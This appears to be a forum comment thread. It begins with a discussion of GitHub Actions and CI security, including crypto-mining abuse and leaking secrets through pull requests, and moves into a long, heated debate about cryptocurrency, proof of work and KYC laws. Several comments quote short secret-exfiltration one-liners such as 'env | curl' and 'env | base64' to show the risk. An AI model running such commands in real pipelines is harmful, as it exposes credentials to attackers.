- do not run on any event.. unless user authorized for that event. Same for actions.
- separate out policies and users cannot edit policies unless authorized to do that
- do not get physical/logical resources (runners, disk quota, long runs, ...) unless given
- default-deny network outbound with url safe-listing
That way only trusted users can run them, and a bit harder for them to get hurt when there is a surprising action that they run
The next level would probably be something like sandboxing : allow anyone to run an action , but a sandbox mode can autofail if violated, and have explicit imports/exports to lock down for how it gets used.
A lot possible.. but need to invest in the basics first..
Unfortunately, using self-hosted runners to provide additional capabilities not supported by Github-hosted ones is basically impossible (for public repos at least) as you can't restrict a runner to an organization or project. Set up a bare-metal runner and it will receive jobs from random forks.
Only if you've configured the actions correctly. I would bet that there is a high number of repositories on both GitLab and GitHub with misconfigured CI pipelines where someone can submit a PR with `env | curl` to grab any secrets defined as environment variables.
The correct mitigation is to ensure that any "secret" variables are marked as "protected" so they can only run on protected branches that are limited to pushes by maintainers. And you'll still need to make sure the masking works in the logs.
They do support integrating with Vault to access secrets in a CI job, but you need to pay them to use that feature. 
If you have access to a repository you can customize the script to do whatever you want, but there will always be a trace tracking it back to you.
There is a discussion about ultimate security (access only when asked) Vs the convenience of self-service.
You can still avoid that by having people use a fork model, or triggering CD from an external project with tight access.
Putting a burocratic process between ICs will only limit their throughput as in Jenkins paradigm.
The better advice is don't hire people you can't trust
logs: `env | base64`
network: `env | gzip | curl`
It should be easy to set most workflows to run sandboxed with almost no capabilities - no secrets access, safelisted network access, safelisted package manager accesses for top 10 langs, etc - so that testing someone's PR isn't scary, and runtime violations make loud noises. The whole 'just disable actions on fork PRs' thing is a great default, but ultimately a figleaf as it's not hard to get someone to run an action.
If so, I wonder if there is a legit need for running modified GitHub actions from non-collaborators?
Could also subject modified actions coming in via pull requests (from non-collaborators) to heavy resources constraints and timeouts.
The attack vector in the article is not the main way miners try to steal CPU from the GitHub community. It's just an interesting one that the journalist chose to write about.
IIRC, they already treat the .github folder as a special case; you can't push modifications to workflow files with a personal access token. So why not ensure that an action or workflow will only run if it is checked into the base branch?
That wouldn't stop PRs from modifying scripts that the action runs, but the current behavior seems a bit counter-intuitive.
The threat models are probably more like 1. "make sure only the right people run actions" and separately, 2. "make sure authorized events/actions only use the expected capabilities." Both largely fail today.
The issue is that even if you don’t allow changes to the actual action workflow, running tests gives an attacker the ability to run arbitrary code. They just need to add the code they want to run to the tests (e.g. have the tests mine crypto)
Could temporarily reduce the population of abusers while we figure out a more sustainable strategy?
This speculation is making some people rich, yes. But the amount of externalities is staggering.
Thanks to PoW nobody can provide a free compute anymore without getting owned, and of course the environmental impact of bitcoin alone is worse than when Saddam Hussein set oil wells on fire while retreating.
Let the world burn, and products rot to shit, as long as my HODL portfolio goes up. Cryptocurrency supporters really are sociopaths, worse than any hedge fund manager.
There are lots of things driving for crypto besides speculation though. Suggesting cryptocurrency supporters are sociopaths is quite simplistic, and overlooks the majority who are not involved in anything like this article discusses
Like what? I mean aside from crime.
E.g. the "Venezuela argument" has been debunked, from my reading.
In my own life I've seen employees ask to be paid in bitcoin, because of the large fees involved in getting your salary and transferring it into Brazil.
So… those "fees" are mainly taxes, and not paying them is illegal.
To steal manned argument I guess is that some people actually do want to buy stuff online without a third party knowing who paid whom.
First of all BTC is terrible for that. But second, most people don't care if a third party knows they bought pizza. Especially since the pizza place still knows, and they need to keep records anyway, because tax laws.
Fourth, if they don't keep records then they can just say you didn't pay them. They can say "oh, that was not our wallet, you must have mistyped".
Fifth, if the pizza has poop on it you can't even reverse the charge.
Sixth, every pizza place will now be a money laundering scheme.
This is not what we want as individuals, nor as a society.
But yes, some people do want to buy a pizza online and not have a third party know. It's basically LARPing.
Buying a house or a car anonymously? That was made illegal on purpose.
Buying a big mansion anonymously? Well that's clearly at the very least tax fraud.
Anyway, I truly want to hear about any legit use case for cryptocurrencies that is not just LARPing, because as far as I've seen nobody in the 12 years since bitcoin launched has come up with one that actually makes sense.
> Suggesting cryptocurrency supporters are sociopaths is quite simplistic,
Yeah, it is. It's like the old expression "it's very hard to make someone understand something when their livelihood depends on them not understanding it", or something like that.
But the amount of rationalization from cryptocurrency proponents I do think is sociopathic.
> and overlooks the majority who are not involved in anything like this article discusses
When you're in the mob you're still one of the baddies, even if you're not actually the one murdering.
I do blame every cryptocurrency supporter. They are complicit in making the world worse for their own profits. They have a moral obligation to recognize their supporting role in this, and to stop it.
Cryptocurrency users aren't any more complicit in others using it for illicit activities than people who use cash. And you seem to be equating cryptocurrency with proof of work and bitcoin, which, again, are ignoring the majority of the real-world use cases.
But just to establish what you're saying, do you agree that PoW and BTC in particular is absolutely terrible for the world? Can we establish that?
I just want to make sure you're not selecting the parts I have not addressed in these comments and from there you're dismissing the things I have said.
If you can agree that PoW and BTC are awful, then there's no point in staying on that topic, but we can instead look at other parts. Otherwise it seems like a dishonest rhetorical device.
I don't know what countries you moved between, but what you did could be illegal. Or if not, the law may have not caught up yet, because the laws tend to be on the financial institutions, not the payer and payee. But probably the intention of the law is that it should be illegal.
Maybe. It depends how exactly the bitcoin was transferred.
I'm not a lawyer, but have a look at this:
That's requirements on payment service providers, so (maybe?) not on you. With a decentralized payment service provider, a case could be made that you are the payment service provider of this transaction, but let's assume not, to not make it simple. Still, it is the intention of this EU law that somebody is, right? That's the world in which the law was written.
If you agree with this, that the intention was that somebody has KYC (Know Your Customer) requirements on your transaction, then as I see it the only remaining argument is that you think KYC laws should not exist.
I hope I've not misrepresented you so far. I honestly want to build a trail from your truly legit and moral transaction to what it means in the larger picture.
If you're against KYC I don't quite know what your argument is (it could be a good one), but they were in fact put in place for a reason. Your honest transfer "under the radar" has the same technical means as the ISIS sympathizer's, and the money laundering mob boss's, or the tax dodging wall street CEO's.
I'll assume that you're not an anarchist-libertarian who considers all government action to be theft, and "money laundering" to be a non-crime.
So… the real question is how do we allow transactions like yours, but not make crime like this be trivial under the same technical means?
So far it's by KYC. And KYC laws and enforcement are not perfect. But baby and bathwater. If your argument is that KYC is inherently bad, then I disagree, but don't make it a distraction while actually making a different point.
And if cryptocurrency is "just like cash", that means that, just like with cash, you legally have to report international money transfers:
Do you think anyone has ever done this with bitcoin, or any other cryptocurrency? I assume not, because cryptocurrency people will pick and choose when it's "just like cash" and when it's not. Or they'll claim "it's not in a country, it's in cyberspace". But that's all clearly rationalizing to the point of trolling.
To summarize my point: The reason we can't have nice things, the reason there are fees and taxes on international money transfers, is that this is exactly the place where an uncountable amount of fraud and crime happens. It's not "clever" to go around KYC, it's illegal. (or if not technically illegal, the intent clearly was that it would be)
(I have more points against cryptocurrencies, but bringing up every topic at the same time will just be a big distracted mess. If we've agreed on PoW, and if you agree on KYC, then maybe we can do other arguments too)
And I'm not libertarian (I'm far too socialist), but I do believe that there are problems with the extent to which we are being tracked by governments, especially because I have a lot of issue with various laws around the world (see: criminalizing homosexuality, drugs, sex toys, women driving) I do believe controlling the methods by which people pay for things extends government control, and having more freedom there allows more personal freedom in general. Perhaps surprisingly, I do support paying due taxes (when it's often what funds social services and social programs).
Actually, speaking of money laundering, I learned recently that you can pay taxes on illicit income and the IRS won't have any issue with you. However, I don't trust that this isn't used to track down criminals by criminal agencies. Money laundering allows people to pay their taxes without implicating themselves, so in many ways it's something I support.
I'm not in any way suggesting cryptocurrency is a good way to get around government tracking. Cash might often be better. I don't particularly support KYC, so I'm excited to see the development around decentralized exchanges. And I think painting all "crime" with the same brush is quite reductive. Yesterday's crime is too often tomorrow's activism: Breaking an NDA to expose human right's abuses, using a VPN to browse wikipedia, the list goes on.
But yes, I 100% agree about PoW being problematic, and have frequently posted on HN about how the only way it will be solved is through government intervention. I guess I'm not much of an anarchist either.
And that the trade-off between allowing your transaction and preventing organized crime is why KYC and money laundering laws were created.
I recently did a 6 figure international transfer, and I had to talk to people at the bank, who had to sign off that the source of my funds were fine and I wasn't doing anything shady (nor being defrauded). Just a 15min phone call.
For someone who regularly does this I assume it's streamlined, but it does make sense for the bank to be suspicious on multiple levels when I do the biggest transfer of my life.
They also checked with me to make sure I did basic security precautions like "Did someone contact you and tell you to make this transfer, or did you come up with it yourself? Did someone send you the account number, or did you look it up on a trusted source?".
Sure, part of that was "cover your ass" for the bank's liability to a mistake, but some of it is legally mandated for KYC/ML.
Again, don't take my comments as saying governments or these laws in particular are perfect. I'm saying they are deliberate because something like them is really really a good idea, both for the individual and society as a whole.
But I think it's a red herring to say "some governments criminalize homosexuality, therefore KYC/ML laws are bad or overreaching".
> I don't particularly support KYC
So what's your alternative proposal for preventing / detecting the crime it really does catch?
What's your proposal for forcing banks to not look the other way when drug cartels bank their profits?
Again, I'm not saying it's perfect, but without KYC/ML banks wouldn't even have an obligation to look, and would have no liability when they aid organized crime. Clearly we need to do something? KYC/ML is not flawless, but it also works. So this is not a "We have to do something, this is something" case.
If you take away KYC/ML you have to replace it with something better. Otherwise you're just saying "defund the police" with no plan to replace the police.
So that's KYC/ML.
I guess I brought up taxes a little bit, but it's another chapter in the book on cryptocurrencies.
Right now there is huge tax evasion happening in industries that deal with cash. Taxi drivers are a prime example, but also plumbers, carpenters, etc...
Not everyone, of course, but it's so easy for them. E.g. it's common practice among people felling trees for people that they charge a lot because they need to pay insurance in case the tree falls on something expensive. But when the tree doesn't, they just pocket the whole thing and don't tell the tax man or insurance company.
What if we had the cryptocurrency dystopia, where everyone who wants to can get paid in some ideal cryptocurrency? I bet you HUGE parts of salaries will suddenly go dark, and be tax free.
People earning 6-7 digit salaries would just not declare that at all. It would take a lot of sense of civic duty to hand off 5-6 digits per year if you know you can get away with not doing that. Most people don't have that, and I can admit I'd be super tempted too, if I knew math would protect me perfectly.
The reason people actually pay income tax today is because double entry accounting and the paper trail actually makes it hard to hide salary payments. And paying people in cash is also logistically hard, and even harder if you have to do it fraudulently.
You can do it with low wage workers, but I sure as hell wouldn't want to have to deal with thousands of dollars in my hand every week.
But even then, in many countries it's illegal to pay salaries in cash. Because of the rampant fraud that happens when salaries are in cash.
And why would you want to be paid in cash to hide it from the government? You say you believe in taxes, so the tax man will know your income eventually anyway. So there's no point in hiding it.
Interesting about IRS and theoretically not reporting you. Sounds similar to some places where robbing a bank with a fake gun carries a lighter sentence, so that robbers are incentivized to bring the fake gun instead of the real one, thus reducing harm to innocent bystanders and police.
They got Capone for tax evasion, so it's a charge you don't want. But I suspect if you just declare you bank robbery gains, that's not going to work well for you.
Proof Of Work ?.
A lot of em are already trying to shift to other viable alternative proofs.
Your analogy of calling Cryptocurrency supporters as sociopaths.
sounds similar to insulting
Edison because he designed the inefficient incandescent bulbs , which consume waaay more energy compared to LEDs built these days.
How would it sound , if someone insults artificial light , just because of that ? .
Cryptocurrencies are perfectly good ideas/products.
Proof of Work’s viability isn’t.
The hate is aimed in the wrong direction.
If he designed and sold that in 2021, trying to replace LED lightbulbs, and lying through his teeth to pump up the value of his lightbulbs, well then yes.
Can blockchain people please first come up with a use case, that isn't crime, before saying it's worth using more energy that many countries? (for a rounding error away from 0 number of transactions)
All the enumerated use cases are so naive and uninformed that clearly they've just been invented without knowledge about the field. "Move aside, expert in field, I'll just solve this with technology. No I don't need to hear you describe the issues".
Maybe the cryptocurrency industry needs some environmental regulation thrown at it?
for scammers and speculators
You’ll know why it’s a great product/ service
Once it’s environmental viability has been figured
Hating crypto , because news reporters only show you the scammers and the speculators , is blind hatred.
Crypto has/does much much more , than just act as a form of trading / speculation
Scammers often steal money in dollars too.
Speculators often trade currency pairs with dollar in them.
Are you still gonna say people who use the dollar for daily transactions don’t exist ?
That dollar is also a good idea only for scammers and speculators ?
I've done many. Order of magnitude better experience than bitcoin, which I've also done.
And without knowing that your bitcoin transaction cost many tonnes of co2 on stolen electricity (~70% of which is based on fossil fuels, per a recent bitcoin energy use study).
It's like building an instant messaging system based on throwing molotov cocktails on your neighbors houses to create smoke signals.
> try using smart contracts in crypto
Smart contracts is just the dumbest idea yet. Anyone who thinks they're a good idea clearly doesn't know what the actual challenges are in existing contracts. It's not solving these challenges at all, but instead making them much worse.
> Hating crypto , because news reporters only show you the scammers and the speculators , is blind hatred.
Seriously? But that's all there is. To a rounding error.
And for good reason. Aside for committing crimes cryptocurrencies are worse in every single aspect.
> Are you still gonna say people who use the dollar for daily transactions don’t exist ? That dollar is also a good idea only for scammers and speculators ?
What do you think the percentage of dollar transaction that's crime? What do you think is the case for bitcoin?
If someone is willing to fund time spend on researching how to do it safely I would do it.
But I am not aware of anyone willing to fund hundreds of hours on such research. And it includes myself.
I do not care what 'news' reporters 'report'. I am in contact with several crypto-adjacent messages each week, all of them scammers in in mail inbox, on Telegram, in Discord.
Crypto-adjacent scam spam is over half of ads that managed to reach my on my own computer.
I consider it perfectly good reason to heavily dislike BTC and BTC-adjacent things.
> Crypto has/does much much more , than just act as a form of trading / speculation
Yes, it is also scam platform.
No, because it is untrue. Unlike crypto.